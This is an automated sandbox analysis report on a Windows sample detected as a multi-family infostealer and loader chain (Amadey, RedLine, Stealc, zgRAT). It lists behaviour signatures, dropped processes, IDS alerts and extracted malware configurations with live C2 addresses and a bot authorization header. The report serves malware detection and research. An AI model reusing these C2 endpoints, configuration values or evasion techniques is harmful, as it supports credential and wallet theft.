Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1516777
MD5:604496f01be7b778d8a564c57677d644
SHA1:b3a7781e8a94cadb2450c4a3df11b4a2e94ef82c
SHA256:ad1e3f88d7d1c29836570f13b8b540dfdaca9434b9f47170b00cf54519c5edcc
Tags:exeuser-jstrosch
Infos:

Detection

Amadey, PureLog Stealer, RedLine, Stealc, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Use Short Name Path in Command Line
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5256 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 604496F01BE7B778D8A564C57677D644)
    • skotes.exe (PID: 1648 cmdline: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 604496F01BE7B778D8A564C57677D644)
  • skotes.exe (PID: 7392 cmdline: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 604496F01BE7B778D8A564C57677D644)
    • 3ec4738210.exe (PID: 7672 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe" MD5: D512CD419C532FC7D6C3A5C6C4A303A3)
      • WerFault.exe (PID: 2004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1512 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • b74664dd7e.exe (PID: 7812 cmdline: "C:\Users\user\1000015002\b74664dd7e.exe" MD5: D512CD419C532FC7D6C3A5C6C4A303A3)
      • WerFault.exe (PID: 4892 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7812 -s 1512 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • 6dbb7bdf47.exe (PID: 5884 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe" MD5: 5D8D57A3729CFBBABA4E3E60D6BEF3D8)
    • 610cd559ac.exe (PID: 1920 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe" MD5: 6A6234CE6830B57E0F1FA2E728E7E8D1)
      • axplong.exe (PID: 7308 cmdline: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 6A6234CE6830B57E0F1FA2E728E7E8D1)
        • gold.exe (PID: 4516 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe" MD5: 389881B424CF4D7EC66DE13F01C7232A)
          • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • RegAsm.exe (PID: 2516 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • 3ec4738210.exe (PID: 8032 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe" MD5: D512CD419C532FC7D6C3A5C6C4A303A3)
  • b74664dd7e.exe (PID: 6220 cmdline: "C:\Users\user\1000015002\b74664dd7e.exe" MD5: D512CD419C532FC7D6C3A5C6C4A303A3)
  • 3ec4738210.exe (PID: 1964 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe" MD5: D512CD419C532FC7D6C3A5C6C4A303A3)
    • WerFault.exe (PID: 6148 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • axplong.exe (PID: 1464 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 6A6234CE6830B57E0F1FA2E728E7E8D1)
  • b74664dd7e.exe (PID: 4500 cmdline: "C:\Users\user\1000015002\b74664dd7e.exe" MD5: D512CD419C532FC7D6C3A5C6C4A303A3)
  • axplong.exe (PID: 1452 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 6A6234CE6830B57E0F1FA2E728E7E8D1)
  • axplong.exe (PID: 576 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 6A6234CE6830B57E0F1FA2E728E7E8D1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Threatname: RedLine

{"C2 url": "95.179.250.45:26212", "Bot Id": "LiveTraffic", "Message": "Error! Disable antivirus and try again!", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeJoeSecurity_StealcYara detected StealcJoe Security
          C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeJoeSecurity_StealcYara detected StealcJoe Security
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 4 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000006.00000002.1318437657.0000000000DA1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000008.00000002.1352623579.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    0000001E.00000003.2089661467.0000000004EE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      00000006.00000003.1277581266.0000000004950000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        0000000D.00000003.1600953137.0000000004AB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                          Click to see the 52 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          31.2.gold.exe.3775570.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                            31.2.gold.exe.3775570.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                              33.2.RegAsm.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                                28.2.axplong.exe.6f0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                                  27.2.axplong.exe.6f0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                                    Click to see the 12 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7392, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3ec4738210.exe
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7392, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3ec4738210.exe
                                    Sigma detected: Use Short Name Path in Command Line
                                    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5256, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" , ProcessId: 1648, ProcessName: skotes.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:33:38.681360+020020446231A Network Trojan was detected192.168.2.749825185.215.113.1680TCP
                                    2024-09-24T15:33:38.681360+020020446231A Network Trojan was detected192.168.2.749852185.215.113.1680TCP
                                    2024-09-24T15:33:38.681360+020020446231A Network Trojan was detected192.168.2.749855185.215.113.1680TCP
                                    2024-09-24T15:33:38.681360+020020446231A Network Trojan was detected192.168.2.749819185.215.113.1680TCP
                                    2024-09-24T15:33:38.681360+020020446231A Network Trojan was detected192.168.2.749717185.215.113.4380TCP
                                    2024-09-24T15:35:37.136350+020020446231A Network Trojan was detected192.168.2.749801185.215.113.1680TCP
                                    2024-09-24T15:36:04.136546+020020446231A Network Trojan was detected192.168.2.749830185.215.113.1680TCP
                                    2024-09-24T15:36:43.819130+020020446231A Network Trojan was detected192.168.2.749866185.215.113.1680TCP
                                    2024-09-24T15:37:01.566139+020020446231A Network Trojan was detected192.168.2.749879185.215.113.1680TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:35:53.840810+020020432341A Network Trojan was detected95.179.250.4526212192.168.2.749821TCP
                                    2024-09-24T15:37:15.285680+020020432341A Network Trojan was detected89.105.223.19629862192.168.2.749898TCP
                                    2024-09-24T15:37:46.777675+020020432341A Network Trojan was detected185.215.113.6715206192.168.2.749924TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:33:38.681360+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:35:53.657234+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:35:58.931250+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:35:59.393216+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:00.402391+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:00.769945+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:00.958179+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:01.143360+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:03.055540+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:03.548521+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:03.887840+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:04.166587+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:04.350692+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:04.659811+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:04.664950+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:06.491422+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:06.677334+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:07.048605+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:07.738255+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:08.064694+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:08.249381+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:08.438020+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:08.624201+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:08.823942+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:36:09.753404+020020432311A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:37:15.107885+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:20.355088+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:20.811134+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:20.991019+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:21.180394+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:21.368771+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:21.549360+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:21.763966+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:22.077872+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:22.257888+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:24.314182+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:24.557310+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:24.735328+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:24.962931+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:25.140645+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:25.434684+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:25.641795+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:26.029664+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:26.034927+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:26.824404+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:27.101950+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:27.356722+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:27.534468+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:27.747274+020020432311A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:46.559368+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:53.389418+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:54.174066+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:54.447557+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:54.794379+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:55.089779+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:55.320667+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:55.543913+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:56.733238+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:56.954731+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:57.176073+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:57.689197+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:57.694532+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:58.725984+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    2024-09-24T15:37:59.059504+020020432311A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:35:59.398088+020020460561A Network Trojan was detected95.179.250.4526212192.168.2.749821TCP
                                    2024-09-24T15:37:20.816167+020020460561A Network Trojan was detected89.105.223.19629862192.168.2.749898TCP
                                    2024-09-24T15:37:54.012342+020020460561A Network Trojan was detected185.215.113.6715206192.168.2.749924TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:37:05.586889+020020185811A Network Trojan was detected192.168.2.749883185.215.113.1680TCP
                                    2024-09-24T15:37:34.841271+020020185811A Network Trojan was detected192.168.2.749915103.130.147.21180TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:33:38.681360+020020446961A Network Trojan was detected192.168.2.749833185.215.113.1680TCP
                                    2024-09-24T15:33:38.681360+020020446961A Network Trojan was detected192.168.2.749758185.215.113.1680TCP
                                    2024-09-24T15:33:38.681360+020020446961A Network Trojan was detected192.168.2.749766185.215.113.1680TCP
                                    2024-09-24T15:33:38.681360+020020446961A Network Trojan was detected192.168.2.749730185.215.113.4380TCP
                                    2024-09-24T15:33:38.681360+020020446961A Network Trojan was detected192.168.2.749719185.215.113.4380TCP
                                    2024-09-24T15:33:38.681360+020020446961A Network Trojan was detected192.168.2.749762185.215.113.1680TCP
                                    2024-09-24T15:34:15.985131+020020446961A Network Trojan was detected192.168.2.749711185.215.113.4380TCP
                                    2024-09-24T15:34:19.845277+020020446961A Network Trojan was detected192.168.2.749713185.215.113.4380TCP
                                    2024-09-24T15:36:12.610790+020020446961A Network Trojan was detected192.168.2.749836185.215.113.1680TCP
                                    2024-09-24T15:37:04.809122+020020446961A Network Trojan was detected192.168.2.749882185.215.113.1680TCP
                                    2024-09-24T15:37:07.964770+020020446961A Network Trojan was detected192.168.2.749887185.215.113.1680TCP
                                    2024-09-24T15:37:11.449923+020020446961A Network Trojan was detected192.168.2.749892185.215.113.1680TCP
                                    2024-09-24T15:37:14.453708+020020446961A Network Trojan was detected192.168.2.749897185.215.113.1680TCP
                                    2024-09-24T15:37:18.351817+020020446961A Network Trojan was detected192.168.2.749902185.215.113.1680TCP
                                    2024-09-24T15:37:21.697865+020020446961A Network Trojan was detected192.168.2.749907185.215.113.1680TCP
                                    2024-09-24T15:37:33.283973+020020446961A Network Trojan was detected192.168.2.749913185.215.113.1680TCP
                                    2024-09-24T15:37:42.616081+020020446961A Network Trojan was detected192.168.2.749920185.215.113.1680TCP
                                    2024-09-24T15:37:45.850872+020020446961A Network Trojan was detected192.168.2.749923185.215.113.1680TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:37:51.769177+020020543501A Network Trojan was detected192.168.2.749929185.244.181.14080TCP
                                    2024-09-24T15:37:55.296257+020020543501A Network Trojan was detected192.168.2.749932185.244.181.14080TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:37:07.748435+020020544161A Network Trojan was detected192.168.2.7507471.1.1.153UDP
                                    2024-09-24T15:37:13.015059+020020544161A Network Trojan was detected192.168.2.7633851.1.1.153UDP
                                    2024-09-24T15:37:23.868092+020020544161A Network Trojan was detected192.168.2.7552791.1.1.153UDP
                                    2024-09-24T15:37:34.593397+020020544161A Network Trojan was detected192.168.2.7613941.1.1.153UDP
                                    2024-09-24T15:37:45.470645+020020544161A Network Trojan was detected192.168.2.7539271.1.1.153UDP
                                    2024-09-24T15:37:56.439169+020020544161A Network Trojan was detected192.168.2.7640651.1.1.153UDP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:35:53.657234+020020460451A Network Trojan was detected192.168.2.74982195.179.250.4526212TCP
                                    2024-09-24T15:37:15.107885+020020460451A Network Trojan was detected192.168.2.74989889.105.223.19629862TCP
                                    2024-09-24T15:37:46.559368+020020460451A Network Trojan was detected192.168.2.749924185.215.113.6715206TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:35:31.260514+020020442431Malware Command and Control Activity Detected192.168.2.749793185.215.113.3780TCP
                                    2024-09-24T15:36:03.003178+020020442431Malware Command and Control Activity Detected192.168.2.749828185.215.113.3780TCP
                                    2024-09-24T15:36:15.278770+020020442431Malware Command and Control Activity Detected192.168.2.749840185.215.113.3780TCP
                                    2024-09-24T15:37:20.579088+020020442431Malware Command and Control Activity Detected192.168.2.749904185.215.113.3780TCP
                                    2024-09-24T15:37:34.504959+020020442431Malware Command and Control Activity Detected192.168.2.749914185.215.113.3780TCP
                                    2024-09-24T15:37:50.839638+020020442431Malware Command and Control Activity Detected192.168.2.749927185.215.113.3780TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:34:52.607276+020028561471A Network Trojan was detected192.168.2.749744185.215.113.1680TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:34:15.276869+020028561221A Network Trojan was detected185.215.113.4380192.168.2.749709TCP
                                    2024-09-24T15:35:05.458550+020028561221A Network Trojan was detected185.215.113.1680192.168.2.749744TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749714185.215.113.10380TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749812185.215.113.2680TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749872185.215.113.1680TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749749185.215.113.11780TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749777194.116.215.19580TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749802185.215.113.2680TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749746185.215.113.11780TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749837185.215.113.11780TCP
                                    2024-09-24T15:33:38.681360+020028033053Unknown Traffic192.168.2.749716185.215.113.10380TCP
